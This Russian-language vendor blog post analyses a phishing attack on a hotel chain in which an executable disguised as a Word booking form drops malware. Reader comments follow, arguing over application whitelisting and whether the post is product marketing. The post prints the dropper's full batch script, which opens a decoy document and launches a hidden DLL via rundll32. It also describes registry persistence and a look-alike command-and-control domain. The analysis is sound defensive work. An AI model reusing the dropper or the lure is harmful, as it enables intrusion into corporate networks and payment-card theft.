Недавно был опубликован отчет, в котором сообщалось о многочисленных кибер-атаках на крупные гостиничные сети. Атаки, главным образом, были направлены на кражу данных банковских карт клиентов. Для этого хакеры заражали POS-терминалы в отелях. Несколько дней назад один из клиентов Panda Security, пользователь Adaptive Defense 360, сеть гостиниц класса люкс, подвергся атаке. Мы воспользовались данной возможностью, чтобы показать, как кибер-преступники пытаются проникнуть в корпоративные сети.
В большинстве случаев подобные типы атак запускаются через электронную почту с помощью вложенного файла, который компрометирует компьютер жертвы, или ссылки на страницу, которая использует уязвимости для достижения цели преступника. В случае с нашим клиентом атака началась с почтового сообщения, адресованного сотруднику отеля, с информацией о том, что во вложенном файле представлена вся информация, необходимая для оплаты проживания в отеле в конце мая 2016 года.
Сообщение содержало вложение в виде заархивированного файла, которое при открытии содержало файл с иконкой Microsoft Word. Когда файл был запущен, он показал следующее:
Это форма бронирования номера в отеле, заполненная потенциальным клиентом отеля. Здесь представлена информация об оплате проживания в конце мая 2016 года. Как Вы можете видеть, здесь нет ничего необычного. На самом деле, этот документ является идентичным тому, что данный сотрудник отеля отправляет своим клиентам (даже название аналогичное), но если мы внимательно посмотрим, то сможем увидеть, что файл пришел в архиве zip. Несмотря на то, что показывается иконка Word, мы имеем дело с исполняемым файлом.
Когда Вы запускаете данный файл, то на диске создается три файла, первый из которых запускается:
– reader_sl.cmd
– ROCA.ING.docx
– adobeUpd.dll (MD5: A213E36D3869E626D4654BCE67F6760C)
Содержимое первого файла показано ниже:
@echo off
start “” ROCA.ING.docx
Set xOS=x64
If “%PROCESSOR_ARCHITECTURE%”==”x86” If Not Defined PROCESSOR_ARCHITEW6432 Set xOS=x86
IF “%xOS%” == “x64” (start “” C:\Windows\SysWOW64\rundll32.exe adobeUpd.dll,Wenk)
IF “%xOS%” == “x86” (start “” C:\Windows\System32\rundll32.exe adobeUpd.dll,Wenk)
ping -n 12 localhost
Как Вы можете увидеть, первое, что происходит, — открывается документ Word, который и позволяет обмануть жертву. Затем запускается adobeUpd.dll с параметром “Wenk”. Во время выполнения, этот файл изменяется и помечается как скрытый и только для чтения, а также создается запись в реестре Windows, которая запускается каждый раз, когда включается компьютер.
Затем осуществляется связь с определенным URL:
www.************.ga/en/scripts/en.php?stream=lcc&user=iPmbzfAIRMFw
В результате этого скачивается файл, который содержит данные пользователя этого параметра URL (iPmbzfAIRMFw). В случае совпадения осуществляется попытка загрузки файла:
www.************.ga/en/scripts/iPmbzfAIRMFw.jpg
Когда мы пытались скачать этот файл, то он был недоступен: он не попал в систему нашего клиента, т.к. была заблокирована попытка заражения, и вредоносная программа не сумела там запуститься. Домен URL точно такой же, как и домен нашего клиента, но вот только клиент имеет домен в зоне “.com”, а хакеры зарегистрировали домен с точно таким же названием, но только в Габоне (“.ga”). Таким образом, сходство доменного имени не привлекает внимания, если служба безопасности отеля осуществляет анализ сетевого трафика.
Несмотря на то, что файл iPmbzfAIRMFw.jpg оказался недоступен, если мы посмотрим на код adobeUpd.dll, то мы можем увидеть, что на самом деле в этом файле осуществляется поиск определенного кода, а затем он шифрует данные из него и запускает его в виде PE (созданный как “Temp\systm”).
Позже adobeUpd.dll остается в цикле, произвольно соединяясь со следующим URL каждые несколько минут:
www.************.ga/en/scripts/en.php?mode=OPR&uid=iPmbzfAIRMFw&type=YFm
Как мы видим, эта атака была специально ориентирована на данную гостиничную сеть. Преступники уже удалили все следы сервера, где клиент мог бы подключиться к вредоносной программе, и т.к. мы прервали атаку, то теперь мы можем только предполагать, что же они собирались делать далее. Исходя из нашего опыта, такой тип атак направлен на заражение остальных пользователей сети предприятия-жертвы, чтобы впоследствии добраться до поставленной цели: POS-терминалов, которые обрабатывают платежи, осуществленные с помощью банковских карт, что мы могли наблюдать во многих других случаях.
Традиционный антивирус не работает против такого типа атак, т.к. они создаются специально под конкретную жертву, при этом хакеры уверены в том, что их вредоносная программа не обнаруживается сигнатурами, проактивными технологиями и другими модулями защиты у тех решений безопасности, которые используются жертвой. Вот почему крайне важно иметь EDR-тип сервисов (Endpoint Detection & Response) в сочетании с расширенными технологиями защиты для обеспечения эффективной защиты от подобных целенаправленных атак.
Комментарии (14)
qrck13
11.05.2016 14:38+2Мне кажется, простым пользователям давно пора запрещать выполнение любых *.exe файлов, за исключением тех, что установлены системным администратором. Сразу кучу проблем решит, с подобного рода маскировкой exe-шников под документы и картинки.
amarao
12.05.2016 10:40+1Я правильно понимаю, что проблема заключалась в том, что во вложении был исполняемый файл, который исполнялся почтовым клиентом не смотря на отсутствие флага "+x" для исполнения?
Я думаю, в этой ситуации не нужны антивирусы, а надо всего лишь не выполнять файлы не помеченные на выполнение.qrck13
12.05.2016 11:35У них на винде в качестве +x флага выступает .exe расширение по умолчанию. Хотя NTFS и имеет аттрибуты «исполнение», по умолчанию оно разрешено всему
amarao
12.05.2016 12:46Так это, чем городить специальную систему защиты от идиотства в дизайне, может быть, поправить идиотство в дизайне? Например, по-умолчанию не выставлять +x всему? Надо выполнить — поставь флаг. В этом случае почтовый клиент просто технически не сможет «запустить» исполняемое вложение — флаг-то не поставлен.
lair
… путем засылки исполняемого файла, замаскированного под ворд, который запускает скачивание следующей части атаки? Содержимое которой неизвестно?
Удивительно много новых и неизвестных ходов, несомненно.
Так все-таки, как же именно ваш продукт определил, что идет потенциальное заражение?
LoadRunner
Получатель письма обратился с просьбой проанализировать вложение, не открывая его?
Лучшая защита, кстати — просто не открывать вложение, пока не удостоверишься в подлинности отправителя.
lair
И чем эта технология уникальна для рекламируемого продукта?
LoadRunner
Я лишь предположил. Мне самому интересно, какой настоящий ответ и чем уникальна технология детектирования таких атак.
PSecurity
Если в целом прокомментировать данную ситуацию с этой гостиничной сетью, то хочу обратить внимание на следующее:
1. Сотрудник отеля отправляет формы для бронирования номеров сотням (если не тысячам) потенциальных клиентов в месяц. И эта процедура поставлена на поток. Поэтому, получив письмо с архивом, в котором был «его» файл с формой бронирования, он его смело открыл без каких-либо «задних» мыслей (я сейчас не говорю, правильно это или нет, просто констатация факта).
При этом, опять же, убеждаться в подлинности отправителя в данной ситуации нереально:
1) сотни или тысячи потенциальных клиентов, для проверки писем от которых потребуется много времени;
2) отправитель был один из тех, кто якобы и хотел забронировать отель
2. В данной статье мы не претендуем на что-то такое оригинальное, о чем никто еще не знал. Мы на конкретном примере показали, как осуществлялась попытка заражения. Кстати, для кого-то, возможно, такая схема будет новостью. Все зависит от глубины познаний, профессионального уровня и сферы деятельности читателя. Тут главное другое: обычная повседневная ситуация, а в результате — заражение.
3. Panda Adaptive Defense 360 в режиме Lock блокирует все исполняемые процессы (exe, dll и пр.), которые не классифицированы в антивирусной лаборатории PandaLabs как НЕвредоносные (goodware). В этом режиме каждый исполняемый процесс в режиме реального времени автоматически анализируется и классифицируется в облаке. Более того, решение отслеживает взаимосвязи между всеми процессами, что позволяет отслеживать весь жизненный цикл каждой конкретной угрозы, каждого конкретного процесса. и такой «контекстный» характер мониторинга позволяет с большей точностью анализировать процессы, чтобы более аккуратно принимать решение относительно каждого процесса (и составляющих его подпроцессов). Не буду сейчас останавливаться на всех нюансах работы технологий, но могу сказать, что в этом случае уровень защиты повышается на порядок, особенно если речь идет о неизвестных и целенаправленных атаках. Вы можете попробовать решение и проверить. Поэтому в описываемом случае ряд процессов был заблокирован, а потому атака сорвалась и не достигла своей цели.
lair
Ну то есть это банальный AppLocker.
PSecurity
Нет, это не банальный appLocker.
1. Режим такой расширенной защиты работает полностью в автоматическом режиме, т.е. администратору не требуется создавать какие-либо правила
2. Он блокирует ВСЕ вредоносные или неклассифицированные исполняемые процессы, а не какие-то конкретно. При этом облачная база знаний содержит информацию о более чем 1,5 миллиардах невредоносных процессов, ежесекундно обновляясь.
3. Ресурсоемкий анализ процессов работает в облаке, поэтому нет нагрузки на ресурсы компьютера
4. Система позволяет отслеживать развитие каждого процесса и взаимосвязь между его подпроцессами. В этом случае в зависимости от такой «контекстности» поведение защиты может быть разной в зависимости от ситуации, чтобы исключить ложные срабатывания.
lair
AppLocker можно настроить так, чтобы он блокировал все процессы, кроме разрешенных. На терминалах это разумное поведение.
PSecurity
AppLocker, по сути своей, это контроль приложений.
Panda Adaptive Defense 360 не имеет функции контроля приложений.
Он предоставляет автоматическую расширенную защиту от неизвестных угроз и целенаправленных атак, APT и т.д.
lair
… через контроль приложений. То, что вы это не так называете, не означает, что смысл отличается. Не нравится слово AppLocker? Окей, давайте назовем это white-listing.